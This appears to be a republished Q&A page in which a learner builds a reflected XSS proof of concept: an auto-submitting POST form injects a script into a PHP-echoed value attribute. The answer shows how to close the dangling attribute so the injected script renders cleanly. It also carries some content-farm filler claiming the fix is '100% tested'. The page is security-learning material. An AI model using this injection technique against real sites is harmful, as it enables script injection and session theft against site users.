XSS PoC: Hide Rendered Characters in DOM

All we need is an easy explanation of the problem, so here it is.

I’ve started playing with XSS to better improve my security posture at work. I’ve been able to successfully exploit a reflected XSS attack using a redirected POST form, but I can’t seem to remove the extraneous characters displayed on the page.

I’ve checked:

XSS: Character showing in DOM

https://security.stackexchange.com/questions/207282/xss-character-showing-in-dom?newreg=61e9890d94d34d0c8818158ba541b117

How to load javascript on another webpage through XSS?

But none of the suggestions seem to work for me.

My exploit is a basic form, exploiting a PHP server side script I’ve configured echoing $_POST['username'] into the value attribute:

<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value="&quot;&gt;&lt;script&gt;alert('Hello');&lt;/script&gt;&quot;">
</form>
<script>
    document.getElementById(1).submit();
</script>

Unencoded:

<form id=1 method="post" action="http://vulnerable.site.com">
    <input type="hidden" name="username"
    value=""><script>alert('Hello');</script>">
</form>
<script>
    document.getElementById(1).submit();
</script>

But this pesky "> will not die:

XSS PoC: Hide Rendered Characters in DOM

I’ve tried:

  • Several filter evasion techniques by adding additional characters recommended by OWASP
  • Escaping the "> to &quot;&gt; – this results in syntax errors, and removing the leading quotes breaks the payload. BUT, based on resources linked above, it seems possible based on comments
  • Using CSS selectors to hide the characters in my attack payload (using dev tools, the "> shows up as #text so I thought this might work)

I’m sure it’s something silly, but what am I missing? It’s clearly possible, but I’m not a skilled web developer (hence the fiddling around). Any feedback or advice would be appreciated!

How to solve :

I know you bored from this bug, So we are here to help you! Take a deep breath and look at the explanation of your problem. We have many solutions to this problem, But we recommend you to use the first method because it is tested & true method that will 100% work for you.

Method 1

I eventually figured it out after hours of trial and error. The idea is to close the dangling tag with a separate tag:

So the previous payload was:

"><script>alert('Hello');</script>

Which, after the PHP script parses it, looks like this:

<input type="text" name="username" value="">"> <!-- notice the dangling tag -->

After adding a closing input tag, the solution worked:

"><script>alert('Hello');</script><input type="hidden" value="

And output from PHP parsing:

<input type="text" name="username" value=""><script>alert('Hello');</script><input type="hidden" value="">

Note that the above needs to be HTML encoded to work properly. I omitted it for readability.

Note: Use and implement method 1 because this method fully tested our system.
Thank you 🙂

Leave a Reply